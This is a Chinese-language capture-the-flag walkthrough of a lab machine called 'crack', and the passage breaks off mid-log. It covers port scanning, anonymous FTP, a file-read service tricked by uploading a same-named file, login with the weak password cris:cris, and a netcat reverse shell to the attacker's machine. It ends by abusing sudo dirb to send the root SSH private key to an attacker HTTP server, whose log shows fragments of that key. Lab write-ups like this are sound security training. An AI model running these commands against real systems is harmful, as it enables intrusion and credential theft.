![\"image-20240422200727718\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404222059139.png\")
<\/div>\n
![\"image-20240422201117099\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404222059140.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ rustscan -a 192.168.0.102 -- -A \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.102:21\nOpen 192.168.0.102:4200\nOpen 192.168.0.102:12359\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-22 08:07 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nInitiating Ping Scan at 08:07\nScanning 192.168.0.102 [2 ports]\nCompleted Ping Scan at 08:07, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 08:07\nCompleted Parallel DNS resolution of 1 host. at 08:07, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 08:07\nScanning crack (192.168.0.102) [3 ports]\nDiscovered open port 21\/tcp on 192.168.0.102\nDiscovered open port 4200\/tcp on 192.168.0.102\nDiscovered open port 12359\/tcp on 192.168.0.102\nCompleted Connect Scan at 08:07, 0.00s elapsed (3 total ports)\nInitiating Service scan at 08:07\nScanning 3 services on crack (192.168.0.102)\nCompleted Service scan at 08:07, 17.12s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.102.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:07\nNSE: [ftp-bounce 192.168.0.102:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 08:07, 7.06s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 1.16s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNmap scan report for crack (192.168.0.102)\nHost is up, received conn-refused (0.00040s latency).\nScanned at 2024-04-22 08:07:22 EDT for 25s\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxrwxrwx 2 0 0 4096 Jun 07 2023 upload [NSE: writeable]\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.0.143\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 2\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n4200\/tcp open ssl\/http syn-ack ShellInABox\n|_ssl-date: TLS randomness does not represent time\n|_http-title: Shell In A Box\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n| ssl-cert: Subject: commonName=crack\n| Issuer: commonName=crack\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-06-07T10:20:13\n| Not valid after: 2043-06-02T10:20:13\n| MD5: c63b:e888:4cb9:a338:dbc5:4f7b:d515:2d14\n| SHA-1: 2082:49e1:a5cd:889a:4df2:10ed:6370:ac43:cc04:0ffc\n| -----BEGIN CERTIFICATE-----\n| MIIDATCCAemgAwIBAgIUD80eYcXiFUkFj6DPtPttqvoiqGgwDQYJKoZIhvcNAQEL\n| BQAwEDEOMAwGA1UEAwwFY3JhY2swHhcNMjMwNjA3MTAyMDEzWhcNNDMwNjAyMTAy\n| MDEzWjAQMQ4wDAYDVQQDDAVjcmFjazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\n| AQoCggEBAN60d\/vu8L4ff\/3dS6sl3dOHq4RdrTmSSmMngqo7TYoitpRVHaiPNwtF\n| W0hPILjY9y1GUMUXx3e+Fo4EaPYETf22A9y1gtFov64d6\/WfHyhLcAOinYScMW1Q\n| hgXeRU5ne4DHnb71YmOQade1ogVs8cb9M\/kitw32L\/BBOQZps0OPXVSwJbBKEezG\n| BtBAACTQnoUBJn0P+MxTpSZGPHd5W8lWkr2ryzqhGeErOOT7ANI32\/OR4qFfR2gI\n| MOjpT3\/r\/nVFoiURjYmjogOTwEuP1DqLzdup1DOFE1kLvtQNtweLZcaFVq0GRDur\n| zBXbHCpmxfXRwadaUspdCAEQuLdDQj8CAwEAAaNTMFEwHQYDVR0OBBYEFLkZLivE\n| NMtHEZBBmcRHn8zEHJasMB8GA1UdIwQYMBaAFLkZLivENMtHEZBBmcRHn8zEHJas\n| MA8GA1UdEwEB\/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBABlhLlrhUqaHEggk\n| 0bWyIXtshHDdYF1r5KKRiSQvuRJDRVmTmK6oSC5TjYzjHBtN4D4calhJLas4CO5v\n| CCX1RVovHrq21r0mHoZGiLMQAzajNk3JTNAP8d5Fj+H5pkGyov7meh0xJBCZjVWb\n| Je5DabD1d4c7s7+xpgbtitKf2SqNNoaX\/xmMTDdA+omDl6Uej6hA\/DKCZjCspyf+\n| ubtzgUDy4GMxartz93Sngm7ofeXEUHJ6eJrmB6O\/ey8KFfGrdkTecbZphc9yHxVY\n| RYFcqSf1FKR38lnKaAqYUAhGnDQT7\/EgMKvV5Je0UpZHnJX2+9DAzvvle0BUwriO\n| c37M3rg=\n|_-----END CERTIFICATE-----\n|_http-favicon: Unknown favicon MD5: 2AB43FA7D288987C3DBE15F0C53EE407\n12359\/tcp open unknown syn-ack\n| fingerprint-strings: \n| GenericLines: \n| File to read:NOFile to read:\n| NULL: \n|_ File to read:\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port12359-TCP:V=7.94SVN%I=7%D=4\/22%Time=66265300%P=x86_64-pc-linux-gnu%\nSF:r(NULL,D,"File\\x20to\\x20read:")%r(GenericLines,1C,"File\\x20to\\x20read:N\nSF:OFile\\x20to\\x20read:");\nService Info: OS: Unix\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:07\nCompleted NSE at 08:07, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 25.93 seconds<\/code><\/pre>\nFTP<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ ftp 192.168.0.102\nConnected to 192.168.0.102.\n220 (vsFTPd 3.0.3)\nName (192.168.0.102:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> pwd\nRemote directory: \/\nftp> ls -la\n229 Entering Extended Passive Mode (|||5945|)\n150 Here comes the directory listing.\ndrwxr-xr-x 3 0 114 4096 Jun 07 2023 .\ndrwxr-xr-x 3 0 114 4096 Jun 07 2023 ..\ndrwxrwxrwx 2 0 0 4096 Jun 07 2023 upload\n226 Directory send OK.\nftp> cd upload\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||8782|)\n150 Here comes the directory listing.\ndrwxrwxrwx 2 0 0 4096 Jun 07 2023 .\ndrwxr-xr-x 3 0 114 4096 Jun 07 2023 ..\n-rwxr-xr-x 1 1000 1000 849 Jun 07 2023 crack.py\n226 Directory send OK.\nftp> get crack.py\nlocal: crack.py remote: crack.py\n229 Entering Extended Passive Mode (|||56825|)\n150 Opening BINARY mode data connection for crack.py (849 bytes).\n100% |***********************************************************************************************************| 849 34.39 KiB\/s 00:00 ETA\n226 Transfer complete.\n849 bytes received in 00:00 (33.63 KiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat crack.py \nimport os\nimport socket\ns = socket.socket()\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nport = 12359\ns.bind(('', port))\ns.listen(50)\n\nc, addr = s.accept()\nno = "NO"\nwhile True:\n try:\n c.send('File to read:'.encode())\n data = c.recv(1024)\n file = (str(data, 'utf-8').strip())\n filename = os.path.basename(file)\n check = "\/srv\/ftp\/upload\/"+filename\n if os.path.isfile(check) and os.path.isfile(file):\n f = open(file,"r")\n lines = f.readlines()\n lines = str(lines)\n lines = lines.encode()\n c.send(lines)\n else:\n c.send(no.encode())\n except ConnectionResetError:\n pass<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n12359<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ nc 192.168.0.102 12359\nFile to read:\/etc\/passwd\nNOFile to read:..\/..\/..\/..\/..\/etc\/passwd\nNOFile to read:crack.py\n['import os\\n', 'import socket\\n', 's = socket.socket()\\n', 's.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n', 'port = 12359\\n', "s.bind(('', port))\\n", 's.listen(50)\\n', '\\n', 'c, addr = s.accept()\\n', 'no = "NO"\\n', 'while True:\\n', ' try:\\n', " c.send('File to read:'.encode())\\n", ' data = c.recv(1024)\\n', " file = (str(data, 'utf-8').strip())\\n", ' filename = os.path.basename(file)\\n', ' check = "\/srv\/ftp\/upload\/"+filename\\n', ' if os.path.isfile(check) and os.path.isfile(file):\\n', ' f = open(file,"r")\\n', ' lines = f.readlines()\\n', ' lines = str(lines)\\n', ' lines = lines.encode()\\n', ' c.send(lines)\\n', ' else:\\n', ' c.send(no.encode())\\n', ' except ConnectionResetError:\\n', ' pass\\n']File to read:\nNOFile to read:<\/code><\/pre>\n\u6240\u4ee5\u4e0d\u53ef\u4ee5\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a\u3002\u3002\u3002\u3002<\/p>\n
\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2a\u540c\u540d\u6587\u4ef6\uff0c\u770b\u770b\u53ef\u4e0d\u53ef\u4ee5\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ ftp 192.168.0.102\nConnected to 192.168.0.102.\n220 (vsFTPd 3.0.3)\nName (192.168.0.102:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> cd upload\n250 Directory successfully changed.\nftp> put passwd\nlocal: passwd remote: passwd\n229 Entering Extended Passive Mode (|||12526|)\n150 Ok to send data.\n 0 0.00 KiB\/s \n226 Transfer complete.\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ nc 192.168.0.102 12359\nFile to read:\/etc\/passwd\n['root:x:0:0:root:\/root:\/bin\/bash\\n', 'daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\\n', 'bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\\n', 'sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\\n', 'sync:x:4:65534:sync:\/bin:\/bin\/sync\\n', 'games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\\n', 'man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\\n', 'lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\\n', 'mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\\n', 'news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\\n', 'uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\\n', 'proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\\n', 'www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\\n', 'backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\\n', 'list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\\n', 'irc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\\n', 'nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\\n', '_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\\n', 'systemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\\n', 'messagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\\n', 'sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\\n', 'cris:x:1000:1000:cris,,,:\/home\/cris:\/bin\/bash\\n', 'systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\\n', 'shellinabox:x:106:112:Shell In A Box,,,:\/var\/lib\/shellinabox:\/usr\/sbin\/nologin\\n', 'ftp:x:107:114:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\\n']File to read:<\/code><\/pre>\n\u770b\u6765\u4ed6\u8fd9\u4e2a\u68c0\u6d4b\u53ea\u662f\u68c0\u6d4b\u662f\u5426\u5b58\u5728\u6587\u4ef6\uff01\u53d1\u73b0\u5b58\u5728bash\u7528\u6237\uff1acris<\/code><\/p>\n4200<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ curl http:\/\/192.168.0.102:4200\ncurl: (52) Empty reply from server\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ curl https:\/\/192.168.0.102:4200\ncurl: (60) SSL certificate problem: self-signed certificate\nMore details here: https:\/\/curl.se\/docs\/sslcerts.html\n\ncurl failed to verify the legitimacy of the server and therefore could not\nestablish a secure connection to it. To learn more about this situation and\nhow to fix it, please visit the web page mentioned above.<\/code><\/pre>\n\u4f7f\u7528cris<\/code>\u8fdb\u884c\u5c1d\u8bd5\uff1a<\/p>\n![\"image-20240422202441365\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5f31\u5bc6\u7801cris:cris<\/code>\u767b\u5f55\u6210\u529f\uff01<\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
<\/div><\/p>\n\u4e0d\u597d\u5f04wp\uff0c\u5f39\u5230kali\u4e0a\u53bb\uff1a<\/p>\n
nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n<\/div><\/p>\n\u7ee7\u7eed\u641c\u96c6\u4fe1\u606f\uff1a<\/p>\n
(remote) cris@crack:\/home\/cris$ ls -la\ntotal 44\ndrwxr-xr-x 3 cris cris 4096 jun 7 2023 .\ndrwxr-xr-x 3 root root 4096 jun 7 2023 ..\nlrwxrwxrwx 1 cris cris 9 jun 7 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 cris cris 220 jun 7 2023 .bash_logout\n-rw-r--r-- 1 cris cris 3526 jun 7 2023 .bashrc\n-rwxr-xr-x 1 cris cris 849 jun 7 2023 crack.py\ndrwxr-xr-x 3 cris cris 4096 jun 7 2023 .local\n-rw-r--r-- 1 cris cris 807 jun 7 2023 .profile\n-rw-r--r-- 1 cris cris 66 jun 7 2023 .selected_editor\n-rw------- 1 cris cris 19 jun 7 2023 user.txt\n-rw------- 1 cris cris 51 jun 7 2023 .Xauthority\n-rwxr-xr-x 1 cris cris 170 jun 7 2023 ziempre.py\n(remote) cris@crack:\/home\/cris$ cat user.txt \neG4TUsTBxSFjTOPHMV\n(remote) cris@crack:\/home\/cris$ sudo -l\nMatching Defaults entries for cris on crack:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser cris may run the following commands on crack:\n (ALL) NOPASSWD: \/usr\/bin\/dirb\n(remote) cris@crack:\/home\/cris$ cat ziempre.py \n#!\/usr\/local\/lib\/python3.7\nfrom subprocess import Popen\nimport sys\nprogram = "\/home\/cris\/crack.py"\nwhile True:\n p = Popen("python3 "+program, shell=True)\n p.wait()<\/code><\/pre>\n\u63d0\u6743\u81f3root<\/h3>\n
\u56e0\u4e3a\u53ef\u4ee5\u4f7f\u7528dirb<\/code>\u8fdb\u884c\u626b\u63cf\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u62ff\u654f\u611f\u6587\u4ef6\u4f5c\u4e3a\u5b57\u5178\u8fdb\u884c\u626b\u63cf\uff01<\/p>\n(remote) cris@crack:\/home\/cris$ sudo \/usr\/bin\/dirb http:\/\/192.168.0.143:8888\/ \/root\/.ssh\/id_rsa\n\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nSTART_TIME: Mon Apr 22 14:32:16 2024\nURL_BASE: http:\/\/192.168.0.143:8888\/\nWORDLIST_FILES: \/root\/.ssh\/id_rsa\n\n-----------------\n\nGENERATED WORDS: 38 \n\n---- Scanning URL: http:\/\/192.168.0.143:8888\/ ----\n\n-----------------\nEND_TIME: Mon Apr 22 14:32:17 2024\nDOWNLOADED: 38 - FOUND: 0<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/randomfile1 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/frand2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/-----BEGIN HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/xNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/tDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Kn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/EAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/wtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/j8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/b2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/ HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/peiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/wQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1 HTTP\/1.1" 404 -\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] code 404, message File not found\n192.168.0.102 - - [22\/Apr\/2024 08:27:55] "GET \/Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl HTTP\/1.1" 404 -\n192.168.0.102 - - 